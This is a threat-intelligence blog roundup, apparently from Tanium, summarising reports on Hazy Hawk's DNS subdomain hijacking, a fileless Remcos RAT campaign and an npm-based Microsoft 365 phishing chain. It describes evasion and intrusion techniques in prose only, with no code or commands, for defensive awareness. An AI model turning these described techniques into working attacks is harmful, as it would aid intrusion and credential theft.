CTI Roundup: Hazy Hawk, Remcos RAT, and npm Phishing

This week, Tanium’s Cyber Threat Intelligence (CTI) team investigates how threat actors are exploiting forgotten or orphaned DNS records. Next up, our CTI team highlights a stealthy malware campaign that uses fileless execution techniques to deploy Remcos RAT. Finally, the team wraps up with an overview of a novel phishing campaign that uses a malicious npm (Node package manager) as part of its delivery mechanism.

Hazy Hawk uses DNS records to target domains

A recent Infoblox report highlights how stale DNS records—especially those pointing to decommissioned cloud infrastructure—can be hijacked by attackers and used for malicious purposes. One actor, Hazy Hawk, is a DNS-savvy threat actor that is known to do just that.

Infoblox became aware of this actor in early 2025 after it gained control of subdomains belonging to the U.S. Centers for Disease Control and Prevention (CDC). Since these gaps in DNS are hard to identify, researchers believe that Hazy Hawk likely has access to a large passive DNS service.

So far, the attacker has been observed targeting dozens of organizations.

How Hazy Hawk targets cloud resources

Hazy Hawk specializes in hijacking abandoned cloud resources like AWS S3 buckets and Azure endpoints by exploiting forgotten DNS records. As Infoblox notes, executing these types of attacks requires an advanced and uncommon level of technical sophistication.

Hazy Hawk has become adept at identifying gaps in DNS records, hijacking domains, and repurposing them to host malicious URLs. To evade detection, the actor will hijack the subdomains of popular and reputable domains, obfuscate URLs, use content from other sites for their page, and redirect victims through at least one URL that uses a well-known service.

Victims of this attack are often directed into a traffic distribution system (TDS) that will decide where they should be sent.

Infoblox notes that the landing page often doesn’t match the initial lure. For example, many of the actor’s URLs leverage the previously hijacked “cdc.gov” subdomain, and redirect the victim through a Blogspot page, followed by a “.xyz” page.

Analyst comments from Tanium’s Cyber Threat Intelligence team

As Infoblox points out, Hazy Hawk is a reminder that “because DNS is not widely understood as a threat vector, these kinds of attacks can run undetected for long periods of time.”

This actor is actively targeting high profile organizations and doesn’t need to breach a perimeter to be successful.

This type of attack is hard to identify unless you are actively monitoring DNS hygiene.

New malware campaign delivers fileless Remcos RAT

A recent Qualys post highlights a stealthy malware campaign that uses fileless execution techniques to deploy Remcos RAT, which is a powerful remote access trojan (RAT).

The attack leverages PowerShell and Windows-native tools like “mshta.exe” to evade traditional endpoint defenses.

How the malware gets in and stays in

According to Qualys, the attack starts with a “new-tax3.11.zip” file. Malicious LNK files are embedded within the ZIP archives, which execute an obfuscated HTML application (HTA) file containing VBS script.

Qualys analyzed the “new-tax311.zip” file and found that initial execution happens via MSHTA to execute an obfuscated HTA file. This HTA file contains obfuscated VBScript code that is capable of bypassing Windows Defender.

The code also downloads PowerShell scripts to set PowerShell to bypass execution policy, run in hidden mode, and create a registry key for persistence. The HTA file will also download several payloads to the user’s public directory, one of which runs at startup.

How the script delivers Remcos RAT

The PowerShell script, “24.ps1,” is obfuscated and packed with several meaningless functions and variables. It uses custom string manipulation to decode two base64 encoded blobs. The script also calls Win32 APIs to allocate memory and to inject and execute code in memory.

One of the decoded blobs is believed to be the Remcos RAT binary. It is compiled using Visual Studio C++ 8, and operates via multiple different modules to establish persistence, gather system details, bypass UAC, and connect to its C2 domain.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Many of the tactics, techniques, and procedures (TTPs) in this attack are consistent with nation-state and advanced persistent threat (APT) level actors, making the campaign more relevant. The campaign uses many popular techniques including fileless malware, LOLBins, and commodity RATs.

This is yet another campaign that prioritizes defense evasion—a process that’s increasingly being automated by threat actors.

[Read also: 15 cybersecurity terms you (and your CEO) ought to know by now]

Threat actors combine AES and malicious npm packages in phishing campaign

Researchers at Fortra have discovered a novel phishing campaign that uses a malicious npm package as part of its delivery mechanism. The package, which was distributed through the npm registry, was designed to harvest credentials by mimicking legitimate modules.

How does the phishing attack work?

Fortra walked through a phishing attack that begins with an email containing a malicious .HTM attachment. The email was successfully delivered to the inbox, likely because the file appears harmless. The file includes encrypted code that warranted additional analysis and was found to point to JavaScript.

As Fortra notes, the JavaScript file was “part of a malicious npm package hosted under the guise of a typical open-source library.” The package would load and deliver a second stage script responsible for creating custom phishing links using the target’s email address, leading them to a fake Microsoft 365 login page.

What’s in the phishing email?

As noted, the phishing email contains a malicious .HTM file attachment. Upon further investigation, Fortra discovered that the file uses AES encryption to hide a string stored within a particular variable.

AES encryption is not often seen in phishing campaigns, as actors will often leverage less sophisticated methods of obfuscation. After decrypting the content, they discovered it pointed to a URL hosted on “jsDelivr,” which is a CDN for distributing things like npm packages.

Understanding the malicious npm package

By the time Fortra went to investigate, the npm package had already been blocked. However, it was still able to install the package via Node.js and found that one of the downloaded folders, MOMENTUM, holds a “NOW.API.JS,” which is the next stage of the attack. This file loads additional malicious content.

How victims are redirected to phishing sites

Fortra identified a series of malicious URL redirections. The previously mentioned JavaScript referenced a known malicious URL. They discovered that the redirect site returned by the API was offline and had been flagged by Cloudflare for phishing. Fortra identified a newer version of the package that had updated URLs, one of which points to an active phishing page. This site would redirect the victim to a landing page to steal credentials.

The final phishing site was offline at the time of Fortra’s investigation. A previous “Any.Run” report was obtained to reveal a screen capture of what the page looked like when it was live. The site is a typical Microsoft 365 fake login page.

Analyst comments from Tanium’s Cyber Threat Intelligence team

As Fortra mentions, the different techniques used in this attack are not unique. But when combined, they create a more effective threat. Actors are now commonly blending TTPs to increase the effectiveness of their campaigns, and this one is no different.

Fortra’s analysis also reminds us that credential theft is, and will remain, a primary objective for threat actors. Because of this, staying ahead of these TTPs and up to date with the latest lures and tricks is essential.

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.